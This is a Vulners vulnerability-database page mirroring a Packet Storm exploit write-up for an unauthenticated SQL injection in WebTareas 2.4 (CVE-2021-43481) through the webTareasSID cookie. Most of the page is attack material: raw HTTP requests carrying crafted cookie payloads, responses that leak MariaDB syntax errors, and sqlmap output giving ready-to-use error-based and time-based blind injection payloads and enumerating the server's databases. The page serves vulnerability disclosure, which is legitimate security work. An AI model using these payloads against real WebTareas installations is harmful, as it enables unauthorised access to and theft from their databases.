Vulners
Lucene search
WebTareas 2.4 SQL Injection
🗓️ 27 Mar 2023 00:00:00Reported by Hubert WojciechowskiType 
packetstorm🔗 packetstormsecurity.com👁 288 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | WebTareas 2.4 - Blind SQL injection (Authenticated) Vulnerability | 11 May 202200:00 | – | zdt |
 | CVE-2021-43481 | 21 Apr 202200:25 | – | circl |
 | webTareas SQL注入漏洞 | 20 Apr 202200:00 | – | cnnvd |
 | CVE-2021-43481 | 20 Apr 202219:41 | – | cve |
 | CVE-2021-43481 | 20 Apr 202219:41 | – | cvelist |
 | WebTareas 2.4 - Blind SQLi (Authenticated) | 11 May 202200:00 | – | exploitdb |
 | EUVD-2021-30412 | 3 Oct 202520:07 | – | euvd |
 | CVE-2021-43481 | 20 Apr 202220:15 | – | nvd |
| WebTareas 2.4 SQL Injection | 11 May 202200:00 | – | packetstorm |
 | Sql injection | 20 Apr 202220:15 | – | prion |
10
`# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: webTareasSID in cookie
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:50 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:39 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 355
Connection: close
Content-Type: text/html; charset=UTF-8
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br />
<b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />
-----------------------------------------------------------------------------------------------------------------------
SQLMap:
-----------------------------------------------------------------------------------------------------------------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
[11:49:03] [INFO] testing MySQL
[11:49:03] [INFO] confirming MySQL
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[11:49:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:49:03] [INFO] fetching database names
[11:49:04] [INFO] starting 6 threads
[11:49:06] [INFO] retrieved: 'zxcv'
[11:49:06] [INFO] retrieved: 'information_schema'
[11:49:06] [INFO] retrieved: 'performance_schema'
[11:49:06] [INFO] retrieved: 'test'
[11:49:06] [INFO] retrieved: 'phpmyadmin'
[11:49:06] [INFO] retrieved: 'mysql'
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] zxcv
[11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'
[11:49:06] [WARNING] your sqlmap version is outdated
[*] ending @ 11:49:06 /2022-10-15/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2023 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 27.5
CVSS 3.19.8
EPSS0.0063